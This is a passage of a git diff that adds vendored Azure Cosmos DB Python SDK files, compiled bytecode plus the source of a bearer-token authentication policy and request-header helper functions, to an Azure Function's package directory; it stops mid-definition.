files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_vector_session_token.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_version.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_version.cpython-39.pyc new file mode 100644 index 0000000..f4600bb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_version.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/auth.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/auth.cpython-39.pyc new file mode 100644 index 0000000..8d3d258 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/auth.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/container.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/container.cpython-39.pyc new file mode 100644 index 0000000..1a2b8e7 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/container.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/cosmos_client.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/cosmos_client.cpython-39.pyc new file mode 100644 index 0000000..8e27e11 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/cosmos_client.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/database.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/database.cpython-39.pyc new file mode 100644 index 0000000..777c31e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/database.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/diagnostics.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/diagnostics.cpython-39.pyc new file mode 100644 index 0000000..eb32405 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/diagnostics.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/documents.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/documents.cpython-39.pyc new file mode 100644 index 0000000..c6e9ac8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/documents.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/errors.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/errors.cpython-39.pyc new file mode 100644 index 0000000..24d0466 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/errors.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..6c0e5dd Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/http_constants.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/http_constants.cpython-39.pyc new file mode 100644 index 0000000..1da317c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/http_constants.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/offer.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/offer.cpython-39.pyc new file mode 100644 index 0000000..94ed369 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/offer.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/partition_key.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/partition_key.cpython-39.pyc new file mode 100644 index 0000000..b035b41 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/partition_key.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/permission.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/permission.cpython-39.pyc new file mode 100644 index 0000000..d3bec62 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/permission.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/scripts.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/scripts.cpython-39.pyc new file mode 100644 index 0000000..857be6d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/scripts.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/user.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/user.cpython-39.pyc new file mode 100644 index 0000000..8203399 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/user.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_auth_policy.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_auth_policy.py new file mode 100644 index 0000000..0d2b7af --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_auth_policy.py @@ -0,0 +1,166 @@ +# ------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See LICENSE.txt in the project root for +# license information. +# ------------------------------------------------------------------------- +import time + +from typing import Any, Dict, Optional +from azure.core.credentials import AccessToken +from azure.core.pipeline import PipelineRequest, PipelineResponse +from azure.core.pipeline.policies import HTTPPolicy +from azure.cosmos import http_constants + + +# pylint:disable=too-few-public-methods +class _CosmosBearerTokenCredentialPolicyBase(object): + """Base class for a Bearer Token Credential Policy. + + :param credential: The credential. + :type credential: ~azure.core.credentials.TokenCredential + :param str scopes: Lets you specify the type of access needed. + """ + + def __init__(self, credential, *scopes, **kwargs): # pylint:disable=unused-argument + # type: (TokenCredential, *str, **Any) -> None + super(_CosmosBearerTokenCredentialPolicyBase, self).__init__() + self._scopes = scopes + self._credential = credential + self._token = None # type: Optional[AccessToken] + + @staticmethod + def _enforce_https(request): + # type: (PipelineRequest) -> None + + # move 'enforce_https' from options to context so it persists + # across retries but isn't passed to a transport implementation + option = request.context.options.pop("enforce_https", None) + + # True is the default setting; we needn't preserve an explicit opt in to the default behavior + if option is False: + request.context["enforce_https"] = option + + enforce_https = request.context.get("enforce_https", True) + if enforce_https and not request.http_request.url.lower().startswith("https"): + raise ValueError( + "Bearer token authentication is not permitted for non-TLS protected (non-https) URLs." + ) + + @staticmethod + def _update_headers(headers, token): + # type: (Dict[str, str], str) -> None + """Updates the Authorization header with the bearer token. + This is the main method that differentiates this policy from core's BearerTokenCredentialPolicy and works + to properly sign the authorization header for Cosmos' REST API. For more information: + https://docs.microsoft.com/rest/api/cosmos-db/access-control-on-cosmosdb-resources#authorization-header + + :param dict headers: The HTTP Request headers + :param str token: The OAuth token. + """ + headers[http_constants.HttpHeaders.Authorization] = "type=aad&ver=1.0&sig={}".format(token) + + @property + def _need_new_token(self): + # type: () -> bool + return not self._token or self._token.expires_on - time.time() < 300 + + +class CosmosBearerTokenCredentialPolicy(_CosmosBearerTokenCredentialPolicyBase, HTTPPolicy): + """Adds a bearer token Authorization header to requests. + + :param credential: The credential. + :type credential: ~azure.core.TokenCredential + :param str scopes: Lets you specify the type of access needed. + :raises ValueError: If https_enforce does not match with endpoint being used. + """ + + def on_request(self, request): + # type: (PipelineRequest) -> None + """Called before the policy sends a request. + + The base implementation authorizes the request with a bearer token. + + :param ~azure.core.pipeline.PipelineRequest request: the request + """ + self._enforce_https(request) + + if self._token is None or self._need_new_token: + self._token = self._credential.get_token(*self._scopes) + self._update_headers(request.http_request.headers, self._token.token) + + def authorize_request(self, request, *scopes, **kwargs): + # type: (PipelineRequest, *str, **Any) -> None + """Acquire a token from the credential and authorize the request with it. + + Keyword arguments are passed to the credential's get_token method. The token will be cached and used to + authorize future requests. + + :param ~azure.core.pipeline.PipelineRequest request: the request + :param str scopes: required scopes of authentication + """ + self._token = self._credential.get_token(*scopes, **kwargs) + self._update_headers(request.http_request.headers, self._token.token) + + def send(self, request): + # type: (PipelineRequest) -> PipelineResponse + """Authorize request with a bearer token and send it to the next policy + + :param request: The pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + self.on_request(request) + try: + response = self.next.send(request) + self.on_response(request, response) + except Exception: # pylint:disable=broad-except + self.on_exception(request) + raise + else: + if response.http_response.status_code == 401: + self._token = None # any cached token is invalid + if "WWW-Authenticate" in response.http_response.headers: + request_authorized = self.on_challenge(request, response) + if request_authorized: + try: + response = self.next.send(request) + self.on_response(request, response) + except Exception: # pylint:disable=broad-except + self.on_exception(request) + raise + + return response + + def on_challenge(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> bool + """Authorize request according to an authentication challenge + + This method is called when the resource provider responds 401 with a WWW-Authenticate header. + + :param ~azure.core.pipeline.PipelineRequest request: the request which elicited an authentication challenge + :param ~azure.core.pipeline.PipelineResponse response: the resource provider's response + :returns: a bool indicating whether the policy should send the request + """ + # pylint:disable=unused-argument,no-self-use + return False + + def on_response(self, request, response): + # type: (PipelineRequest, PipelineResponse) -> None + """Executed after the request comes back from the next policy. + + :param request: Request to be modified after returning from the policy. + :type request: ~azure.core.pipeline.PipelineRequest + :param response: Pipeline response object + :type response: ~azure.core.pipeline.PipelineResponse + """ + + def on_exception(self, request): + # type: (PipelineRequest) -> None + """Executed when an exception is raised while executing the next policy. + + This method is executed inside the exception handler. + + :param request: The Pipeline request object + :type request: ~azure.core.pipeline.PipelineRequest + """ + # pylint: disable=no-self-use,unused-argument + return diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_base.py new file mode 100644 index 0000000..28ad8d1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/_base.py @@ -0,0 +1,675 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +"""Base functions in the Azure Cosmos database service. +""" + +import base64 +import datetime +import json +import uuid +import binascii +from typing import Dict, Any + +from urllib.parse import quote as urllib_quote +from urllib.parse import urlsplit + +from azure.core import MatchConditions + +from . import auth +from . import documents +from . import partition_key +from . import http_constants +from . import _runtime_constants + +# pylint: disable=protected-access + +_COMMON_OPTIONS = { + 'initial_headers': 'initialHeaders', + 'pre_trigger_include': 'preTriggerInclude', + 'post_trigger_include': 'postTriggerInclude', + 'max_item_count': 'maxItemCount', + 'access_condition': 'accessCondition', + 'indexing_directive': 'indexingDirective', + 'consistency_level': 'consistencyLevel', + 'session_token': 'sessionToken', + 'enable_scan_in_query': 'enableScanInQuery', + 'resource_token_expiry_seconds': 'resourceTokenExpirySeconds', + 'offer_type': 'offerType', + 'offer_throughput': 'offerThroughput', + 'partition_key': 'partitionKey', + 'enable_cross_partition_query': 'enableCrossPartitionQuery', + 'populate_query_metrics': 'populateQueryMetrics', + 'enable_script_logging': 'enableScriptLogging', + 'offer_enable_ru_per_minute_throughput': 'offerEnableRUPerMinuteThroughput', + 'disable_ru_per_minute_usage': 'disableRUPerMinuteUsage', + 'change_feed': 'changeFeed', + 'continuation': 'continuation', + 'is_start_from_beginning': 'isStartFromBeginning', + 'populate_partition_key_range_statistics': 'populatePartitionKeyRangeStatistics', + 'populate_quota_info': 'populateQuotaInfo', + 'content_type': 'contentType', + 'is_query_plan_request': 'isQueryPlanRequest', + 'supported_query_features': 'supportedQueryFeatures', + 'query_version': 'queryVersion' +} + + +def _get_match_headers(kwargs): + # type: (Dict[str, Any]) -> Tuple(Optional[str], Optional[str]) + if_match = kwargs.pop('if_match', None) + if_none_match = kwargs.pop('if_none_match', None) + match_condition = kwargs.pop('match_condition', None) + if match_condition == MatchConditions.IfNotModified: + if_match = kwargs.pop('etag', None) + if not if_match: + raise ValueError("'match_condition' specified without 'etag'.") + elif match_condition == MatchConditions.IfPresent: + if_match = '*' + elif match_condition == MatchConditions.IfModified: + if_none_match = kwargs.pop('etag', None) + if not if_none_match: + raise ValueError("'match_condition' specified without 'etag'.") + elif match_condition == MatchConditions.IfMissing: + if_none_match = '*' + elif match_condition is None: + if 'etag' in kwargs: + raise ValueError("'etag' specified without 'match_condition'.") + else: + raise TypeError("Invalid match condition: {}".format(match_condition)) + return if_match, if_none_match + + +def build_options(kwargs): + # type: (Dict[str, Any]) -> Dict[str, Any] + options = kwargs.pop('request_options', kwargs.pop('feed_options', {})) + for key, value in _COMMON_OPTIONS.items(): + if key in kwargs: + options[value] = kwargs.pop(key) + + if_match, if_none_match = _get_match_headers(kwargs) + if if_match: + options['accessCondition'] = {'type': 'IfMatch', 'condition': if_match} + if if_none_match: + options['accessCondition'] = {'type': 'IfNoneMatch', 'condition': if_none_match} + return options + + +def GetHeaders( # pylint: disable=too-many-statements,too-many-branches + cosmos_client_connection, + default_headers, + verb, + path, + resource_id, + resource_type, + options, + partition_key_range_id=None, +): + """Gets HTTP request headers. + + :param cosmos_client_connection.CosmosClient cosmos_client: + :param dict default_headers: + :param str verb: + :param str path: + :param str resource_id: + :param str resource_type: + :param dict options: + :param str partition_key_range_id: + :return: The HTTP request headers. + :rtype: dict + """ + headers = dict(default_headers) + options = options or {} + + if cosmos_client_connection._useMultipleWriteLocations: + headers[http_constants.HttpHeaders.AllowTentativeWrites] = "true" + + pre_trigger_include = options.get("preTriggerInclude") + if pre_trigger_include: + headers[http_constants.HttpHeaders.PreTriggerInclude] = ( + pre_trigger_include if isinstance(pre_trigger_include, str) else (",").join(pre_trigger_include) + ) + + post_trigger_include = options.get("postTriggerInclude") + if post_trigger_include: + headers[http_constants.HttpHeaders.PostTriggerInclude] = ( + post_trigger_include if isinstance(post_trigger_include, str) else (",").join(post_trigger_include) + ) + + if options.get("maxItemCount"): + headers[http_constants.HttpHeaders.PageSize] = options["maxItemCount"] + + access_condition = options.get("accessCondition") + if access_condition: + if access_condition["type"] == "IfMatch": + headers[http_constants.HttpHeaders.IfMatch] = access_condition["condition"] + else: + headers[http_constants.HttpHeaders.IfNoneMatch] = access_condition["condition"] + + if options.get("indexingDirective"): + headers[http_constants.HttpHeaders.IndexingDirective] = options["indexingDirective"] + + consistency_level = None + + # get default client consistency level + default_client_consistency_level = headers.get(http_constants.HttpHeaders.ConsistencyLevel) + + # set consistency level. check if set via options, this will override the default + if options.get("consistencyLevel"): + consistency_level = options["consistencyLevel"] + headers[http_constants.HttpHeaders.ConsistencyLevel] = consistency_level + elif default_client_consistency_level is not None: + consistency_level = default_client_consistency_level + headers[http_constants.HttpHeaders.ConsistencyLevel] = consistency_level + + # figure out if consistency level for this request is session + is_session_consistency = consistency_level == documents.ConsistencyLevel.Session + + # set session token if required + if is_session_consistency is True and not IsMasterResource(resource_type): + # if there is a token set via option, then use it to override default + if options.get("sessionToken"): + headers[http_constants.HttpHeaders.SessionToken] = options["sessionToken"] + else: + # check if the client's default consistency is session (and request consistency level is same), + # then update from session container + if default_client_consistency_level == documents.ConsistencyLevel.Session: + # populate session token from the client's session container + headers[http_constants.HttpHeaders.SessionToken] = cosmos_client_connection.session.get_session_token( + path + ) + + if options.get("enableScanInQuery"): + headers[http_constants.HttpHeaders.EnableScanInQuery] = options["enableScanInQuery"] + + if options.get("resourceTokenExpirySeconds"): + headers[http_constants.HttpHeaders.ResourceTokenExpiry] = options["resourceTokenExpirySeconds"] + + if options.get("offerType"): + headers[http_constants.HttpHeaders.OfferType] = options["offerType"] + + if options.get("offerThroughput"): + headers[http_constants.HttpHeaders.OfferThroughput] = options["offerThroughput"] + + if options.get("contentType"): + headers[http_constants.HttpHeaders.ContentType] = options['contentType'] + + if options.get("isQueryPlanRequest"): + headers[http_constants.HttpHeaders.IsQueryPlanRequest] = options['isQueryPlanRequest'] + + if options.get("supportedQueryFeatures"): + headers[http_constants.HttpHeaders.SupportedQueryFeatures] = options['supportedQueryFeatures'] + + if options.get("queryVersion"): + headers[http_constants.HttpHeaders.QueryVersion] = options['queryVersion'] + + if "partitionKey" in options: + # if partitionKey value is Undefined, serialize it as [{}] to be consistent with other SDKs. + if options.get("partitionKey") is partition_key._Undefined: + headers[http_constants.HttpHeaders.PartitionKey] = [{}] + # If partitionKey value is Empty, serialize it as [], which is the equivalent sent for migrated collections + elif options.get("partitionKey") is partition_key._Empty: + headers[http_constants.HttpHeaders.PartitionKey] = [] + # else serialize using json dumps method which apart from regular values will serialize None into null + else: + headers[http_constants.HttpHeaders.PartitionKey] = json.dumps([options["partitionKey"]]) + + if options.get("enableCrossPartitionQuery"): + headers[http_constants.HttpHeaders.EnableCrossPartitionQuery] = options["enableCrossPartitionQuery"] + + if options.get("populateQueryMetrics"): + headers[http_constants.HttpHeaders.PopulateQueryMetrics] = options["populateQueryMetrics"] + + if cosmos_client_connection.master_key: + headers[http_constants.HttpHeaders.XDate] = datetime.datetime.utcnow().strftime("%a, %d %b %Y %H:%M:%S GMT") + + if cosmos_client_connection.master_key or cosmos_client_connection.resource_tokens: + authorization = auth._get_authorization_header( + cosmos_client_connection, verb, path, resource_id, IsNameBased(resource_id), resource_type, headers + ) + # urllib.quote throws when the input parameter is None + if authorization: + # -_.!~*'() are valid characters in url, and shouldn't be quoted. + authorization = urllib_quote(authorization, "-_.!~*'()") + headers[http_constants.HttpHeaders.Authorization] = authorization + + if verb in ("post", "put"): + if not headers.get(http_constants.HttpHeaders.ContentType): + headers[http_constants.HttpHeaders.ContentType] = _runtime_constants.MediaTypes.Json + + if not headers.get(http_constants.HttpHeaders.Accept): + headers[http_constants.HttpHeaders.Accept] = _runtime_constants.MediaTypes.Json + + if partition_key_range_id is not None: + headers[http_constants.HttpHeaders.PartitionKeyRangeID] = partition_key_range_id + + if options.get("enableScriptLogging"): + headers[http_constants.HttpHeaders.EnableScriptLogging] = options["enableScriptLogging"] + + if options.get("offerEnableRUPerMinuteThroughput"): + headers[http_constants.HttpHeaders.OfferIsRUPerMinuteThroughputEnabled] = options[ + "offerEnableRUPerMinuteThroughput" + ] + + if options.get("disableRUPerMinuteUsage"): + headers[http_constants.HttpHeaders.DisableRUPerMinuteUsage] = options["disableRUPerMinuteUsage"] + + if options.get("changeFeed") is True: + # On REST level, change feed is using IfNoneMatch/ETag instead of continuation. + if_none_match_value = None + if options.get("continuation"): + if_none_match_value = options["continuation"] + elif options.get("isStartFromBeginning") and not options["isStartFromBeginning"]: + if_none_match_value = "*" + if if_none_match_value: + headers[http_constants.HttpHeaders.IfNoneMatch] = if_none_match_value + headers[http_constants.HttpHeaders.AIM] = http_constants.HttpHeaders.IncrementalFeedHeaderValue + else: + if options.get("continuation"): + headers[http_constants.HttpHeaders.Continuation] = options["continuation"] + + if options.get("populatePartitionKeyRangeStatistics"): + headers[http_constants.HttpHeaders.PopulatePartitionKeyRangeStatistics] = options[ + "populatePartitionKeyRangeStatistics" + ] + + if options.get("populateQuotaInfo"): + headers[http_constants.HttpHeaders.PopulateQuotaInfo] = options["populateQuotaInfo"] + + if options.get("maxIntegratedCacheStaleness"): + headers[http_constants.HttpHeaders.DedicatedGatewayCacheStaleness] = options["maxIntegratedCacheStaleness"] + + return headers + + +def GetResourceIdOrFullNameFromLink(resource_link): + """Gets resource id or full name from resource link. + + :param str resource_link: + :return: The resource id or full name from the resource link. + :rtype: str + """ + # For named based, the resource link is the full name + if IsNameBased(resource_link): + return TrimBeginningAndEndingSlashes(resource_link) + + # Padding the resource link with leading and trailing slashes if not already + if resource_link[-1] != "/": + resource_link = resource_link + "/" + + if resource_link[0] != "/": + resource_link = "/" + resource_link + + # The path will be in the form of + # /[resourceType]/[resourceId]/ .... /[resourceType]/[resourceId]/ or + # /[resourceType]/[resourceId]/ .... /[resourceType]/ + # The result of split will be in the form of + # ["", [resourceType], [resourceId] ... ,[resourceType], [resourceId], ""] + # In the first case, to extract the resourceId it will the element + # before last ( at length -2 ) and the the type will before it + # ( at length -3 ) + # In the second case, to extract the resource type it will the element + # before last ( at length -2 ) + path_parts = resource_link.split("/") + if len(path_parts) % 2 == 0: + # request in form + # /[resourceType]/[resourceId]/ .... /[resourceType]/[resourceId]/. + return str(path_parts[-2]) + return None + + +def GenerateGuidId(): + """Gets a random GUID. + + Note that here we use python's UUID generation library. Basically UUID + is the same as GUID when represented as a string. + + :return: + The generated random GUID. + :rtype: str + """ + return str(uuid.uuid4()) + + +def GetPathFromLink(resource_link, resource_type=""): + """Gets path from resource link with optional resource type + + :param str resource_link: + :param str resource_type: + :return: Path from resource link with resource type appended (if provided). + :rtype: str + """ + resource_link = TrimBeginningAndEndingSlashes(resource_link) + + if IsNameBased(resource_link): + # Replace special characters in string using the %xx escape. For example, + # space(' ') would be replaced by %20 This function is intended for quoting + # the path section of the URL and excludes '/' to be quoted as that's the + # default safe char + resource_link = urllib_quote(resource_link) + + # Padding leading and trailing slashes to the path returned both for name based and resource id based links + if resource_type: + return "/" + resource_link + "/" + resource_type + "/" + return "/" + resource_link + "/" + + +def IsNameBased(link): + """Finds whether the link is name based or not + + :param str link: + + :return: + True if link is name-based; otherwise, False. + :rtype: boolean + """ + if not link: + return False + + # trimming the leading "/" + if link.startswith("/") and len(link) > 1: + link = link[1:] + + # Splitting the link(separated by "/") into parts + parts = link.split("/") + + # First part should be "dbs" + if not (parts and parts[0].lower() == "dbs"): + return False + + # The second part is the database id(ResourceID or Name) and cannot be empty + if len(parts) < 2 or not parts[1]: + return False + + # Either ResourceID or database name + databaseID = parts[1] + + # Length of databaseID(in case of ResourceID) is always 8 + if len(databaseID) != 8: + return True + + return not IsValidBase64String(str(databaseID)) + + +def IsMasterResource(resourceType): + return resourceType in ( + http_constants.ResourceType.Offer, + http_constants.ResourceType.Database, + http_constants.ResourceType.User, + http_constants.ResourceType.Permission, + http_constants.ResourceType.Topology, + http_constants.ResourceType.DatabaseAccount, + http_constants.ResourceType.PartitionKeyRange, + http_constants.ResourceType.Collection, + ) + + +def IsDatabaseLink(link): + """Finds whether the link is a database Self Link or a database ID based link + + :param str link: Link to analyze + :return: True or False. + :rtype: boolean + """ + if not link: + return False + + # trimming the leading and trailing "/" from the input string + link = TrimBeginningAndEndingSlashes(link) + + # Splitting the link(separated by "/") into parts + parts = link.split("/") + + if len(parts) != 2: + return False + + # First part should be "dbs" + if not parts[0] or not parts[0].lower() == "dbs": + return False + + # The second part is the database id(ResourceID or Name) and cannot be empty + if not parts[1]: + return False + + return True + + +def IsItemContainerLink(link): # pylint: disable=too-many-return-statements + """Finds whether the link is a document colllection Self Link or a document colllection ID based link + + :param str link: Link to analyze + :return: True or False. + :rtype: boolean + """ + if not link: + return False + + # trimming the leading and trailing "/" from the input string + link = TrimBeginningAndEndingSlashes(link) + + # Splitting the link(separated by "/") into parts + parts = link.split("/") + + if len(parts) != 4: + return False + + # First part should be "dbs" + if not parts[0] or not parts[0].lower() == "dbs": + return False + + # Third part should be "colls" + if not parts[2] or not parts[2].lower() == "colls": + return False + + # The second part is the database id(ResourceID or Name) and cannot be empty + if not parts[1]: + return False + + # The fourth part is the document collection id(ResourceID or Name) and cannot be empty + if not parts[3]: + return False + + return True + + +def GetItemContainerInfo(self_link, alt_content_path, id_from_response): + """Given the self link and alt_content_path from the response header and + result extract the collection name and collection id. + + Every response header has an alt-content-path that is the owner's path in + ASCII. For document create / update requests, this can be used to get the + collection name, but for collection create response, we can't use it. + + :param str self_link: + Self link of the resource, as obtained from response result. + :param str alt_content_path: + Owner path of the resource, as obtained from response header. + :param str resource_id: + 'id' as returned from the response result. This is only used if it is + deduced that the request was to create a collection. + :return: tuple of (collection rid, collection name) + :rtype: tuple + """ + + self_link = TrimBeginningAndEndingSlashes(self_link) + "/" + + index = IndexOfNth(self_link, "/", 4) + + if index != -1: + collection_id = self_link[0:index] + + if "colls" in self_link: + # this is a collection request + index_second_slash = IndexOfNth(alt_content_path, "/", 2) + if index_second_slash == -1: + collection_name = alt_content_path + "/colls/" + urllib_quote(id_from_response) + return collection_id, collection_name + collection_name = alt_content_path + return collection_id, collection_name + raise ValueError( + "Response Not from Server Partition, self_link: {0}, alt_content_path: {1}, id: {2}".format( + self_link, alt_content_path, id_from_response + ) + ) + + raise ValueError("Unable to parse document collection link from " + self_link) + + +def GetItemContainerLink(link): + """Gets the document collection link. + + :param str link: Resource link + :return: Document collection link. + :rtype: str + """ + link = TrimBeginningAndEndingSlashes(link) + "/" + + index = IndexOfNth(link, "/", 4) + + if index != -1: + return link[0:index] + raise ValueError("Unable to parse document collection link from " + link) + + +def IndexOfNth(s, value, n): + """Gets the index of Nth occurance of a given character in a string. + + :param str s: Input string + :param char value: Input char to be searched. + :param int n: Nth occurrence of char to be searched. + :return: Index of the Nth occurrence in the string. + :rtype: int + """ + remaining = n + for i, elt in enumerate(s): + if elt == value: + remaining -= 1 + if remaining == 0: + return i + return -1 + + +def IsValidBase64String(string_to_validate): + """Verifies if a string is a valid Base64 encoded string, after + replacing '-' with '/' + + :param string string_to_validate: String to validate. + :return: Whether given string is a valid base64 string or not. + :rtype: str + """ + # '-' is not supported char for decoding in Python(same as C# and Java) which has + # similar logic while parsing ResourceID generated by backend + try: + buffer = base64.standard_b64decode(string_to_validate.replace("-", "/")) + if len(buffer) != 4: + return False + except Exception as e: # pylint: disable=broad-except + if isinstance(e, binascii.Error): + return False + raise e + return True + + +def TrimBeginningAndEndingSlashes(path): + """Trims beginning and ending slashes + + :param str path: + + :return: + Path with beginning and ending slashes trimmed. + :rtype: str + """ + if path.startswith("/"): + # Returns substring starting from index 1 to end of the string + path = path[1:] + + if path.endswith("/"): + # Returns substring starting from beginning to last but one char in the string + path = path[:-1] + + return path + + +# Parses the paths into a list of token each representing a property +def ParsePaths(paths): + if len(paths) != 1: + raise ValueError("Unsupported paths count.") + + segmentSeparator = "/" + path = paths[0] + tokens = [] + currentIndex = 0 + + while currentIndex < len(path): + if path[currentIndex] != segmentSeparator: + raise ValueError("Invalid path character at index " + currentIndex) + + currentIndex += 1 + if currentIndex == len(path): + break + + # " and ' are treated specially in the sense that they can have the / (segment separator) + # between them which is considered part of the token + if path[currentIndex] == '"' or path[currentIndex] == "'": + quote = path[currentIndex] + newIndex = currentIndex + 1 + + while True: + newIndex = path.find(quote, newIndex) + if newIndex == -1: + raise ValueError("Invalid path character at index " + currentIndex) + + # check if the quote itself is escaped by a preceding \ in which case it's part of the token + if path[newIndex - 1] != "\\": + break + newIndex += 1 + + # This will extract the token excluding the quote chars + token = path[currentIndex + 1: newIndex] + tokens.append(token) + currentIndex = newIndex + 1 + else: + newIndex = path.find(segmentSeparator, currentIndex) + token = None + if newIndex == -1: + # This will extract the token from currentIndex to end of the string + token = path[currentIndex:] + currentIndex = len(path) + else: + # This will extract the token from currentIndex to the char before the segmentSeparator + token = path[currentIndex:newIndex] + currentIndex = newIndex + + token = token.strip() + tokens.append(token) + + return tokens + + +def create_scope_from_url(url): + parsed_url = urlsplit(url) + return parsed_url.scheme + "://" + parsed_url.hostname + "/.default" + + +def 